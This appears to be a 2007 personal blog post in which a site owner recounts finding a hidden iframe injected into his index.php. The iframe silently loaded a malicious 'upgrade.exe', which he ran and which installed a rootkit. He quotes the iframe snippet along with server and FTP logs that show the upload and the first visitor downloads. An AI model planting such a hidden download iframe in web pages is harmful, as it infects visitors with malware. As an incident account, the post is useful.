Hacked

Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan – it didn’t flag the executable – and I suppose I should grab AdAware or Spybot S&D or both.

<IFRAME name=’StatPage’
src=’upgrade.exe’ width=5 height=5
style=’display:none’></IFRAME>

Now if you’ll excuse me, I’m going to go boil my laptop.

Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.

Update 11/25:
I am so pwned.

First access of this file – the first person who was infected by my site – gives me an idea when it was uploaded to my server.

68.14.90.4 – – [18/Nov/2007:07:23:21 -0800] "GET /~void/tag/t-gondii/upgrade.exe HTTP/1.1" 404 31911 "http://www..com/~void/tag/t-gondii/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"

That’s someone who my webpage may have infected. After that the accesses come several times a page.

This is the ftp access where the hacker uploaded the infection and the hacked index.php:

Sun Nov 18 15:12:32 2007 0 66.246.252.53 94 /var/www/vhosts/.com/web_users/void/index.php b _ o r void ftp 0 * c
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/.com/web_users/void/upgrade.exe b _ i r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/.com/web_users/void/index.php b _ d r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/.com/web_users/void/index.php b _ i r void ftp 0 * c
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/t.com/web_users/void/index.php b _ o r void ftp 0 * c

66.246.252.53 resolves to sr178.2dayhost.com – that’s the hacker.

Update: It installed a rootkit. Grrrr.

Comments are closed.

Bad Behavior has blocked 1695 access attempts in the last 7 days.